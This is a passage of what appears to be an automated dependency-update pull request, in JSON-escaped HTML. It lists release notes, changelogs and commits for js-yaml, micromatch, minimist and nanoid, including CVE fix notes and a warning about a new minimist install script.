(\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/37caaad57dc37d350d9a4577a5da53f482bb2983\"\u003e\u003ccode\u003e37caaad\u003c/code\u003e\u003c/a\u003e 3.14.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/094c0f7a79e6ff9e2b4d50b22686d2586894b58f\"\u003e\u003ccode\u003e094c0f7\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9586ebe23298427d26b3479979bd6499bf3a14c2\"\u003e\u003ccode\u003e9586ebe\u003c/code\u003e\u003c/a\u003e Avoid calling hasOwnProperty of user-controlled objects\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.0...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `micromatch` from 4.0.4 to 4.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/micromatch/releases\"\u003emicromatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.0.8\u003c/h2\u003e\n\u003cp\u003eUltimate release that fixes both CVE-2024-4067 and CVE-2024-4068. We consider the issues low-priority, so even if you see automated scanners saying otherwise, don't be scared.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/micromatch/blob/master/CHANGELOG.md\"\u003emicromatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.0.8] - 2024-08-22\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebackported CVE-2024-4067 fix (from v4.0.6) over to 4.x branch\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.7] - 2024-05-22\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ethis is basically v4.0.5, with some README updates\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eit is vulnerable to CVE-2024-4067\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eUpdated braces to v3.0.3 to avoid CVE-2024-4068\u003c/li\u003e\n\u003cli\u003edoes NOT break API compatibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.6] - 2024-05-21\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003ehasBraces\u003c/code\u003e to check if a pattern contains braces.\u003c/li\u003e\n\u003cli\u003eFixes CVE-2024-4067\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBREAKS API COMPATIBILITY\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eShould be labeled as a major release, but it's not.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.1 - 4.0.5]\u003c/h2\u003e\n\u003ch2\u003e[4.0.0] - 2019-03-20\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onMatch\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onIgnore\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003cli\u003eAdds support for \u003ccode\u003eoptions.onResult\u003c/code\u003e. See the readme for details\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBreaking changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRequire Node.js \u0026gt;= 8.6\u003c/li\u003e\n\u003cli\u003eRemoved support for passing an array of brace patterns to \u003ccode\u003emicromatch.braces()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eTo strictly enforce closing brackets (for \u003ccode\u003e{\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, and \u003ccode\u003e(\u003c/code\u003e), you must now use \u003ccode\u003estrictBrackets=true\u003c/code\u003e instead of \u003ccode\u003estrictErrors\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ecache\u003c/code\u003e - caching and all related options and methods have been removed\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.unixify\u003c/code\u003e was renamed to \u003ccode\u003eoptions.windows\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.nodupes\u003c/code\u003e Was removed. Duplicates are always removed by default. You can override this with custom behavior by using the \u003ccode\u003eonMatch\u003c/code\u003e, \u003ccode\u003eonResult\u003c/code\u003e and \u003ccode\u003eonIgnore\u003c/code\u003e functions.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.snapdragon\u003c/code\u003e was removed, as snapdragon is no longer used.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eoptions.sourcemap\u003c/code\u003e was removed, as snapdragon is no longer used, which provided sourcemap support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.0.0] - 2017-04-11\u003c/h2\u003e\n\u003cp\u003eComplete overhaul, with 36,000+ new unit tests validated against actual output generated by Bash and minimatch. More specifically, 35,000+ of the tests:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003emicromatch results are directly compared to bash results\u003c/li\u003e\n\u003cli\u003ein rare cases, when micromatch and bash disagree, micromatch's results are compared to minimatch's results\u003c/li\u003e\n\u003cli\u003emicromatch is much more accurate than minimatch, so there were cases where I had to make assumptions. I'll try to document these.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThis refactor introduces a parser and compiler that are supersets of more granular parsers and compilers from other sub-modules. Each of these sub-modules has a singular responsibility and focuses on a certain type of matching that aligns with a specific part of the Bash \u0026quot;expansion\u0026quot; API.\u003c/p\u003e\n\u003cp\u003eThese sub-modules work like plugins to seamlessly create the micromatch parser/compiler, so that strings are parsed in one pass, an \u003ca href=\"https://gist.github.com/jonschlinkert/099c8914f56529f75bc757cc9e5e8e2a\"\u003eAST is created\u003c/a\u003e, then a new string is generated by the compiler.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/8bd704ec0d9894693d35da425d827819916be920\"\u003e\u003ccode\u003e8bd704e\u003c/code\u003e\u003c/a\u003e 4.0.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/a0e68416a44da10f3e4e30845ab95af4fd286d5a\"\u003e\u003ccode\u003ea0e6841\u003c/code\u003e\u003c/a\u003e run verb to generate README documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/4ec288484f6e8cccf597ad3d43529c31d0f7a02a\"\u003e\u003ccode\u003e4ec2884\u003c/code\u003e\u003c/a\u003e Merge branch 'v4' into hauserkristof-feature/v4.0.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/03aa8052171e878897eee5d7bb2ae0ae83ec2ade\"\u003e\u003ccode\u003e03aa805\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/micromatch/issues/266\"\u003e#266\u003c/a\u003e from hauserkristof/feature/v4.0.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/814f5f70efcd100ca9d29198867812a3d6ab91a8\"\u003e\u003ccode\u003e814f5f7\u003c/code\u003e\u003c/a\u003e lint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/67fcce6a1077c2faf5ad0c5f998fa70202cc5dae\"\u003e\u003ccode\u003e67fcce6\u003c/code\u003e\u003c/a\u003e fix: CHANGELOG about braces \u0026amp; CVE-2024-4068, v4.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/113f2e3fa7cb30b429eda7c4c38475a8e8ba1b30\"\u003e\u003ccode\u003e113f2e3\u003c/code\u003e\u003c/a\u003e fix: CVE numbers in CHANGELOG\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/d9dbd9a266686f44afb38da26fe016f96d1ec04f\"\u003e\u003ccode\u003ed9dbd9a\u003c/code\u003e\u003c/a\u003e feat: updated CHANGELOG\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/2ab13157f416679f54e3a32b1425e184bd16749e\"\u003e\u003ccode\u003e2ab1315\u003c/code\u003e\u003c/a\u003e fix: use actions/setup-node@v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/micromatch/commit/1406ea38f3e24b29f4d4f46908d5cffcb3e6c4ce\"\u003e\u003ccode\u003e1406ea3\u003c/code\u003e\u003c/a\u003e feat: rework test to work on macos with node 10,12 and 14\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/micromatch/compare/4.0.4...4.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimist` from 1.2.5 to 1.2.8\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/minimistjs/minimist/blob/main/CHANGELOG.md\"\u003eminimist's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/minimistjs/minimist/compare/v1.2.7...v1.2.8\"\u003ev1.2.8\u003c/a\u003e - 2023-02-09\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] Fix long option followed by single dash \u003ca href=\"https://redirect.github.com/minimistjs/minimist/pull/17\"\u003e\u003ccode\u003e[#17](https://github.com/minimistjs/minimist/issues/17)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Remove duplicate test \u003ca href=\"https://redirect.github.com/minimistjs/minimist/pull/12\"\u003e\u003ccode\u003e[#12](https://github.com/minimistjs/minimist/issues/12)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] opt.string works with multiple aliases \u003ca href=\"https://redirect.github.com/minimistjs/minimist/pull/10\"\u003e\u003ccode\u003e[#10](https://github.com/minimistjs/minimist/issues/10)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] Fix long option followed by single dash (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/17\"\u003e#17\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/15\"\u003e\u003ccode\u003e[#15](https://github.com/minimistjs/minimist/issues/15)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Remove duplicate test (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/12\"\u003e#12\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/8\"\u003e\u003ccode\u003e[#8](https://github.com/minimistjs/minimist/issues/8)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Fix long option followed by single dash \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/15\"\u003e\u003ccode\u003e[#15](https://github.com/minimistjs/minimist/issues/15)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] opt.string works with multiple aliases (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/10\"\u003e#10\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/9\"\u003e\u003ccode\u003e[#9](https://github.com/minimistjs/minimist/issues/9)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Fix handling of short option with non-trivial equals \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/5\"\u003e\u003ccode\u003e[#5](https://github.com/minimistjs/minimist/issues/5)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Remove duplicate test \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/8\"\u003e\u003ccode\u003e[#8](https://github.com/minimistjs/minimist/issues/8)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] opt.string works with multiple aliases \u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/9\"\u003e\u003ccode\u003e[#9](https://github.com/minimistjs/minimist/issues/9)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMerge tag 'v0.2.3' \u003ca href=\"https://github.com/minimistjs/minimist/commit/a0267947c7870fc5847cf2d437fbe33f392767da\"\u003e\u003ccode\u003ea026794\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix indentation and whitespace \u003ca href=\"https://github.com/minimistjs/minimist/commit/5368ca4147e974138a54cc0dc4cea8f756546b70\"\u003e\u003ccode\u003e5368ca4\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix indentation and whitespace \u003ca href=\"https://github.com/minimistjs/minimist/commit/e5f5067259ceeaf0b098d14bec910f87e58708c7\"\u003e\u003ccode\u003ee5f5067\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] more cleanup \u003ca href=\"https://github.com/minimistjs/minimist/commit/62fde7d935f83417fb046741531a9e2346a36976\"\u003e\u003ccode\u003e62fde7d\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] more cleanup \u003ca href=\"https://github.com/minimistjs/minimist/commit/36ac5d0d95e4947d074e5737d94814034ca335d1\"\u003e\u003ccode\u003e36ac5d0\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/73923d223553fca08b1ba77e3fbc2a492862ae4c\"\u003e\u003ccode\u003e73923d2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[actions] add reusable workflows \u003ca href=\"https://github.com/minimistjs/minimist/commit/d80727df77bfa9e631044d7f16368d8f09242c91\"\u003e\u003ccode\u003ed80727d\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] add eslint; rules to enable later are warnings \u003ca href=\"https://github.com/minimistjs/minimist/commit/48bc06a1b41f00e9cdf183db34f7a51ba70e98d4\"\u003e\u003ccode\u003e48bc06a\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[eslint] fix indentation \u003ca href=\"https://github.com/minimistjs/minimist/commit/34b0f1ccaa45183c3c4f06a91f9b405180a6f982\"\u003e\u003ccode\u003e34b0f1c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[readme] rename and add badges \u003ca href=\"https://github.com/minimistjs/minimist/commit/5df0fe49211bd09a3636f8686a7cb3012c3e98f0\"\u003e\u003ccode\u003e5df0fe4\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] switch from \u003ccode\u003ecovert\u003c/code\u003e to \u003ccode\u003enyc\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/a48b128fdb8d427dfb20a15273f83e38d97bef07\"\u003e\u003ccode\u003ea48b128\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003ecovert\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e; remove unnecessary \u003ccode\u003etap\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/f0fb958e9a1fe980cdffc436a211b0bda58f621b\"\u003e\u003ccode\u003ef0fb958\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] create FUNDING.yml; add \u003ccode\u003efunding\u003c/code\u003e in package.json \u003ca href=\"https://github.com/minimistjs/minimist/commit/3639e0c819359a366387e425ab6eabf4c78d3caa\"\u003e\u003ccode\u003e3639e0c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] use \u003ccode\u003enpmignore\u003c/code\u003e to autogenerate an npmignore file \u003ca href=\"https://github.com/minimistjs/minimist/commit/be2e038c342d8333b32f0fde67a0026b79c8150e\"\u003e\u003ccode\u003ebe2e038\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOnly apps should have lockfiles \u003ca href=\"https://github.com/minimistjs/minimist/commit/282b570e7489d01b03f2d6d3dabf79cd3e5f84cf\"\u003e\u003ccode\u003e282b570\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eisConstructorOrProto adapted from PR \u003ca href=\"https://github.com/minimistjs/minimist/commit/ef9153fc52b6cea0744b2239921c5dcae4697f11\"\u003e\u003ccode\u003eef9153f\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eaud\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/098873c213cdb7c92e55ae1ef5aa1af3a8192a79\"\u003e\u003ccode\u003e098873c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eaud\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/3124ed3e46306301ebb3c834874ce0241555c2c4\"\u003e\u003ccode\u003e3124ed3\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003esafe-publish-latest\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/4b927de696d561c636b4f43bf49d4597cb36d6d6\"\u003e\u003ccode\u003e4b927de\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add \u003ccode\u003eaud\u003c/code\u003e in \u003ccode\u003eposttest\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/b32d9bd0ab340f4e9f8c3a97ff2a4424f25fab8c\"\u003e\u003ccode\u003eb32d9bd\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] update repo URLs \u003ca href=\"https://github.com/minimistjs/minimist/commit/f9fdfc032c54884d9a9996a390c63cd0719bbe1a\"\u003e\u003ccode\u003ef9fdfc0\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[actions] Avoid 0.6 tests due to build failures \u003ca href=\"https://github.com/minimistjs/minimist/commit/ba92fe6ebbdc0431cca9a2ea8f27beb492f5e4ec\"\u003e\u003ccode\u003eba92fe6\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003etape\u003c/code\u003e \u003ca href=\"https://github.com/minimistjs/minimist/commit/950eaa74f112e04d23e9c606c67472c46739b473\"\u003e\u003ccode\u003e950eaa7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] add missing \u003ccode\u003enpmignore\u003c/code\u003e dev dep \u003ca href=\"https://github.com/minimistjs/minimist/commit/3226afaf09e9d127ca369742437fe6e88f752d6b\"\u003e\u003ccode\u003e3226afa\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMerge tag 'v0.2.2' \u003ca href=\"https://github.com/minimistjs/minimist/commit/980d7ac61a0b4bd552711251ac107d506b23e41f\"\u003e\u003ccode\u003e980d7ac\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/minimistjs/minimist/compare/v1.2.6...v1.2.7\"\u003ev1.2.7\u003c/a\u003e - 2022-10-10\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/6901ee286bc4c16da6830b48b46ce1574703cea1\"\u003e\u003ccode\u003e6901ee2\u003c/code\u003e\u003c/a\u003e v1.2.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/a0267947c7870fc5847cf2d437fbe33f392767da\"\u003e\u003ccode\u003ea026794\u003c/code\u003e\u003c/a\u003e Merge tag 'v0.2.3'\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/c0b26618322e94adea26c68e613ef0be482c6c63\"\u003e\u003ccode\u003ec0b2661\u003c/code\u003e\u003c/a\u003e v0.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/63b8fee87b8e7a003216d5d77ba5d6decf3cfb0d\"\u003e\u003ccode\u003e63b8fee\u003c/code\u003e\u003c/a\u003e [Fix] Fix long option followed by single dash (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/17\"\u003e#17\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/72239e6f0ea77d8be0ad4f682b7ae7d142144395\"\u003e\u003ccode\u003e72239e6\u003c/code\u003e\u003c/a\u003e [Tests] Remove duplicate test (\u003ca href=\"https://redirect.github.com/minimistjs/minimist/issues/12\"\u003e#12\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/34b0f1ccaa45183c3c4f06a91f9b405180a6f982\"\u003e\u003ccode\u003e34b0f1c\u003c/code\u003e\u003c/a\u003e [eslint] fix indentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/3226afaf09e9d127ca369742437fe6e88f752d6b\"\u003e\u003ccode\u003e3226afa\u003c/code\u003e\u003c/a\u003e [Dev Deps] add missing \u003ccode\u003enpmignore\u003c/code\u003e dev dep\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/098873c213cdb7c92e55ae1ef5aa1af3a8192a79\"\u003e\u003ccode\u003e098873c\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eaud\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/9ec4d279ced72ea2f60237218e71cc03aa0dfdd6\"\u003e\u003ccode\u003e9ec4d27\u003c/code\u003e\u003c/a\u003e [Fix] Fix long option followed by single dash\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/minimistjs/minimist/commit/ba92fe6ebbdc0431cca9a2ea8f27beb492f5e4ec\"\u003e\u003ccode\u003eba92fe6\u003c/code\u003e\u003c/a\u003e [actions] Avoid 0.6 tests due to build failures\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/minimistjs/minimist/compare/v1.2.5...v1.2.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for minimist since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `nanoid` from 3.1.12 to 3.1.20\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ai/nanoid/blob/main/CHANGELOG.md\"\u003enanoid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.20\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix ES modules support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.19\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReduced \u003ccode\u003ecustomAlphabet\u003c/code\u003e size (by Enrico Scherlies).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.18\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.exports\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded files without \u003ccode\u003eprocess\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeeded up Nano ID 4 times (by Peter Boyer).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.types\u003c/code\u003e path.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003epackage.types\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved Node.js 15.0.0 with \u003ccode\u003erandomFillSync\u003c/code\u003e regression from \u003ccode\u003eengines.node\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/dafca319733b8b8b434acd11f5a4c59947ff678b\"\u003e\u003ccode\u003edafca31\u003c/code\u003e\u003c/a\u003e Release 3.1.20 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/a6f1f69363507e63d3ae99faaed727779b584e67\"\u003e\u003ccode\u003ea6f1f69\u003c/code\u003e\u003c/a\u003e Remove unnecessary comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/f85e1b0f587edda5bcd40da12f9c455d6eda7f96\"\u003e\u003ccode\u003ef85e1b0\u003c/code\u003e\u003c/a\u003e Release 3.1.19 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/46a116a98efd25b171885f0c8fc5d3d8abd1e2a6\"\u003e\u003ccode\u003e46a116a\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/dd4888e4aaaf1df5ec38c934fa1e609931cf464b\"\u003e\u003ccode\u003edd4888e\u003c/code\u003e\u003c/a\u003e Update size limit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/024e1122a035dac1ad2d68ec567fd023c6f63ae0\"\u003e\u003ccode\u003e024e112\u003c/code\u003e\u003c/a\u003e Fix custom random return condition (\u003ca href=\"https://redirect.github.com/ai/nanoid/issues/248\"\u003e#248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/838404e8481c3fe119b6fc0c87473a59a10518ab\"\u003e\u003ccode\u003e838404e\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/030bf5dc47759a6199619b332937ba3e7a91db03\"\u003e\u003ccode\u003e030bf5d\u003c/code\u003e\u003c/a\u003e Add Node.js 10 to CI\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/157808ddff14bdb7c081cdfb4ef9fe6ce31e9023\"\u003e\u003ccode\u003e157808d\u003c/code\u003e\u003c/a\u003e Update development configs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/2c512c3218919c0624e478f64a63c2111474cef6\"\u003e\u003ccode\u003e2c512c3\u003c/code\u003e\u003c/a\u003e Remove debug code\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca 